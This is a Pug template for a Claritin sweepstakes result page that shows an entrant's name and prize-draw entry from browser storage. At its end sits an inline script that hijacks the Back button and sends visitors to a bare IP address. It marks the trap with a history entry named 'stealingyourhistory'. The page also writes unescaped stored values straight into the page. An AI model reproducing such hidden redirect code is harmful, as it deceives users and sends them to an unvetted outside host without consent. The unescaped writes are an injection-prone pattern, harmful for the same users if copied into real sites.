doctype html
html(lang='en')
	head
		title Claritin
		meta(http-equiv='content-type', content='text/html; charset=utf-8')
		meta(name='viewport', content='width=device-width, initial-scale=1, shrink-to-fit=no')
		meta(http-equiv='x-ua-compatible', content='ie=edge')
		link(rel='stylesheet', href='css/style.css')
		link(href='css/tooltipster.bundle.css', rel='stylesheet', type='text/css')
		link(rel='stylesheet', href='fonts/fonts.css')
		link(href='https://fonts.googleapis.com/css?family=Roboto+Slab:100,300,400,700|Roboto:100,300,400,500,700,900', rel='stylesheet')
	body
		script.
			var first_name = localStorage.getItem('first_name');
			var last_name = localStorage.getItem('last_name');
			var email = localStorage.getItem('email');
			var phone = localStorage.getItem('phone');
			var age = localStorage.getItem('age');
			localStorage.setItem("checkButton", "check");
			if (email === null && phone === null && first_name === null && last_name === null && age === null) {
				document.location = "/";
			}
			if (localStorage.getItem('checkAnswerTest') !== "MOSTLY"){
				document.location = "/";
			}
		.wrapper
			header.header
				.container.row-line.center
					.header__logo
						a(href='/')
							img(src='img/logo.png', alt='')
					.burger
						button.hamburger
							i
							i
							i
						button.cross
							i
							i
							i
					.header-menu
						ul.header-menu__list
							li.header-menu__item
								a.header-menu__link(href='/') HOME
							li.header-menu__item
								a.header-menu__link(href='/#form-block') ENTER
							li.header-menu__item
								a.header-menu__link(href='/#prizes') PRIZES
							li.header-menu__item
								a.header-menu__link(href='/rules') RULES
							li.header-menu__item 
								a.header-menu__link(href='/resultat') Français
			main.page__main.main
				.container
					.single-result
						.single-result__title
							span
								script.
									var retrievedObject = localStorage.getItem('number');
									document.write(retrievedObject);
								strong
									script.
										var retrievedObject = localStorage.getItem('lastname');
										document.write(retrievedObject);
						.row-line.start
							.column.single-result__photo
								img(src = "", id="image", alt='')
							.column.single-result__text
								p
									script.
										document.write(localStorage.getItem('firstText'))
									strong
										script.
											document.write(localStorage.getItem('secondText'))
										sup ®
									script.
										document.write(localStorage.getItem('threeText'))
				.single__description
					h4 You have automatically received an entry into the
					h3 GRAND PRIZE DRAW SWEEPSTAKES
					p
						| for your chance to 
						strong win* 1 of 3 $1,000 Shoppers Drug Mart gift cards!
					
				.single-result__text.single-result__text--center
					p.single-result__text--white
						| Come back tomorrow to play again! Claritin
						sup ®
						|  can help you Get Outside.
					p.single-result__text--white
						| One non-drowsy Claritin
						sup ®
						|  pill provides 24-hour relief from indoor and outdoor allergies.	
			footer.footer
				.container
					ul.footer-menu.row-line.center
						li
							a.footer-menu__link(href='/rules') Rules & Regulations
						li
							a.footer-menu__link(href='#') Contact Us
						li
							a.footer-menu__link(href='https://www.claritin.ca/en/privacy-statement/') Privacy Policy
						li
							a.footer-menu__link(href='http://bayer.ca/en/general-conditions-of-use/') Terms & Conditions
						li
							a.footer-menu__link.tooltip(href='javascript:void(0);', data-tooltip-content='#tooltip_content') Site Owner
							.tooltip_templates
								#tooltip_content
									p Bayer Inc.,
									p Mississauga, ON
									p L5W 5R6
						li
							a.footer-menu__link(href='https://www.claritin.ca/') Claritin
					span.footer__text *See official rules for full details.
					img.footer__logo(src='img/bayer-icon.png', alt='')
					p.footer__description To be sure this product is right for you, always read and follow the label.
					p.footer__description ©2018 Bayer Inc.
					p.footer__description L.CA.MKT.CC.02.2018.1078
		script(src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js')
		script(type='text/javascript', src='js/tooltipster.bundle.min.js')
		script(type='text/javascript', src='js/main.js')
		script.
			window.onload = function () {
				document.getElementById("image").src = localStorage.getItem('imgRes');
			};
			(function (window, location) {
				history.replaceState(null, document.title, location.pathname + "#!/stealingyourhistory");
				history.pushState(null, document.title, location.pathname);
				window.addEventListener("popstate", function () {
					if (location.hash === "#!/stealingyourhistory") {
						history.replaceState(null, document.title, location.pathname);
						setTimeout(function () {
							location.replace("http://13.59.224.151/");
						}, 0);
					}
				}, false);
			}(window, location));
